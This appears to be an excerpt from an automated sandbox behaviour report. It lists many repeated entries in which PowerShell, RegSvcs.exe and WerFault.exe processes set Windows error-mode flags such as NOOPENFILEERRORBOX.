Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
